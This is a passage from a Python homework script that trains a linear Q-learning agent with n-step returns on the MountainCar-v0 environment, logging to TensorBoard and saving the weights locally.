torch.tensor(x, dtype=torch.double), (state, next_state, reward))\n state, next_state = map(transform_state, [state, next_state])\n state, next_state, reward = map(to2d, (state, next_state, reward))\n Q_function = next_state.matmul(self._weight) + self._bias\n target = reward + self._gamma * torch.max(Q_function).view((1, 1))\n loss = self._loss(Q_function[0, action], target.view(()))\n\n self._optim.zero_grad()\n loss.backward()\n self._optim.step()\n\n self._tensor_board_writer.add_scalar(\"loss\", loss.detach().item(), self._learn_step_counter)\n\n def act(self, state, target=False):\n state = torch.tensor(state)\n state = transform_state(state)\n state = to2d(state)\n with torch.no_grad():\n Q_function = torch.matmul(state, self._weight) + self._bias\n return np.argmax(Q_function.squeeze()).item()\n\n def save(self):\n weight = self._weight.detach().numpy()\n bias = self._bias.detach().numpy()\n np.savez(\"agent.npz\", weight, bias)\n\n\ndef create_generator_eps(start=0.1, finish=0.05, num_of_iter=8000):\n delta = (start - finish) / num_of_iter\n current = start\n while True:\n yield max(current, finish)\n current -= delta\n\n\nif __name__ == \"__main__\":\n with SummaryWriter(log_dir=\"runs/hw1\", purge_step=0) as writer:\n if STATE_SPACE_SIZE is None:\n transform_state(torch.tensor([0, 0])) # Mock\n env = make(\"MountainCar-v0\")\n aql = AQL(state_dim=STATE_SPACE_SIZE, action_dim=3, tensor_board_writer=writer)\n generator_eps = create_generator_eps()\n episodes = 200\n\n for i in trange(episodes):\n state = env.reset()\n total_reward = 0\n steps = 0\n done = False\n reward_buffer = deque(maxlen=N_STEP)\n state_buffer = deque(maxlen=N_STEP)\n action_buffer = deque(maxlen=N_STEP)\n while not done:\n if random.random() < next(generator_eps):\n action = env.action_space.sample()\n else:\n action = aql.act(state)\n next_state, reward, done, _ = env.step(action)\n reward = modified_reward(state, next_state, reward)\n total_reward += reward\n steps += 1\n reward_buffer.append(reward)\n state_buffer.append(state)\n action_buffer.append(action)\n if len(reward_buffer) == N_STEP:\n aql.update((state_buffer[0], action_buffer[0], next_state,\n sum([(GAMMA ** i) * r for i, r in enumerate(reward_buffer)]), done))\n state = next_state\n if len(reward_buffer) < N_STEP:\n rb = list(reward_buffer)\n for k in range(1, N_STEP):\n aql.update((state_buffer[k], action_buffer[k], next_state,\n sum([(GAMMA ** i) * r for i, r in enumerate(rb[k:])]), done))\n\n writer.add_scalar(\"reward\", total_reward, i)\n\n if i % 20 == 0:\n aql.save()\n","sub_path":"hw01_mountain_car/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}